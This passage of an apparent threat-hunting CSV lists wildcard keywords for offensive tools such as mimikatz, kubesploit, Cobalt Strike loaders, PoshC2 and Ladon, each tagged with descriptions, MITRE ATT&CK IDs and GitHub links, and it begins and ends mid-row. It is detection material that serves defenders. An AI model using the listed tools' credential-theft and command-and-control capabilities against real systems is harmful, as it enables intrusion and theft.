Golang,T1021.001 - T1027 - T1071.001 - T1043 - T1059.006,TA0005 - TA0002 - TA0011,N/A,N/A,C2,https://github.com/cyberark/kubesploit,1,1,N/A,10,10,1030,102,2023-04-08T08:32:23Z,2021-02-09T15:54:23Z -*kubesploitAgent-Linux*,offensive_tool_keyword,kubesploit,Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang,T1021.001 - T1027 - T1071.001 - T1043 - T1059.006,TA0005 - TA0002 - TA0011,N/A,N/A,C2,https://github.com/cyberark/kubesploit,1,1,N/A,10,10,1030,102,2023-04-08T08:32:23Z,2021-02-09T15:54:23Z -*kubesploit-main*,offensive_tool_keyword,kubesploit,Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang,T1021.001 - T1027 - T1071.001 - T1043 - T1059.006,TA0005 - TA0002 - TA0011,N/A,N/A,C2,https://github.com/cyberark/kubesploit,1,1,N/A,10,10,1030,102,2023-04-08T08:32:23Z,2021-02-09T15:54:23Z -*kubesploitServer-Darwin*,offensive_tool_keyword,kubesploit,Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang,T1021.001 - T1027 - T1071.001 - T1043 - T1059.006,TA0005 - TA0002 - TA0011,N/A,N/A,C2,https://github.com/cyberark/kubesploit,1,1,N/A,10,10,1030,102,2023-04-08T08:32:23Z,2021-02-09T15:54:23Z -*kubesploitServer-Linux*,offensive_tool_keyword,kubesploit,Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang,T1021.001 - T1027 - T1071.001 - T1043 - T1059.006,TA0005 - TA0002 - TA0011,N/A,N/A,C2,https://github.com/cyberark/kubesploit,1,1,N/A,10,10,1030,102,2023-04-08T08:32:23Z,2021-02-09T15:54:23Z -*kuhl_m_sekurlsa_nt6.c*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*kuhl_m_sekurlsa_nt6.h*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*kuhl_m_sekurlsa_packages.c*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*kuhl_m_sekurlsa_packages.h*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*kuhl_m_sekurlsa_utils.c*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*kuhl_m_sekurlsa_utils.h*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*kwallet2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*kwetza*,offensive_tool_keyword,kwetza,Kwetza infects an existing Android application with either custom or default payload templates to avoid detection by antivirus. Kwetza allows you to infect Android applications using the target applications default permissions or inject additional permissions to gain additional functionality.,T1402 - T1027 - T1059.001 - T1574.002 - T1583.001 - T1588.002,TA0001 - TA0004 - TA0005 - TA0011,N/A,N/A,Defense Evasion,https://github.com/sensepost/kwetza,1,0,N/A,N/A,7,604,256,2023-07-21T16:30:40Z,2016-09-22T14:39:10Z -*kyleavery/AceLdr*,offensive_tool_keyword,cobaltstrike,Cobalt Strike UDRL for memory scanner evasion.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/kyleavery/AceLdr,1,1,N/A,10,10,712,123,2023-09-28T19:47:03Z,2022-08-11T00:06:09Z -*kyleavery/inject-assembly*,offensive_tool_keyword,cobaltstrike,Inject .NET assemblies into an existing process,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/kyleavery/inject-assembly,1,1,N/A,10,10,449,75,2022-01-19T19:15:11Z,2022-01-03T15:38:10Z -*L0phtCrack*,offensive_tool_keyword,L0phtCrack,L0phtCrack attempts to crack Windows passwords from hashes which it can obtain (given proper access) from stand-alone Windows workstations. networked servers. primary domain controllers. or Active Directory. In some cases it can sniff the hashes off the wire. It also has numerous methods of generating password guesses (dictionary. brute force. etc). LC5 was discontinued by Symantec in 2006. then re-acquired by the original L0pht guys and reborn as LC6 in 2009. For free alternatives. consider ophcrack. Cain and Abel. or John the Ripper. For downloads and more information. visit the L0phtCrack homepage.,T1003 - T1110 - T1212 - T1552 - T1609,TA0001 - TA0002 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Credential Access,http://www.l0phtcrack.com/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*label-implant *,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*Ladon * AllScan*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon * CiscoScan*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon * OnlineIP*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon * OnlinePC*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon * OsScan*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon * OxidScan*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon *.txt *,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon *DeBase64*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon *FtpScan*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon *LdapScan*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon *SMBGhost*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon *SmbHashScan*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon *SmbScan*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 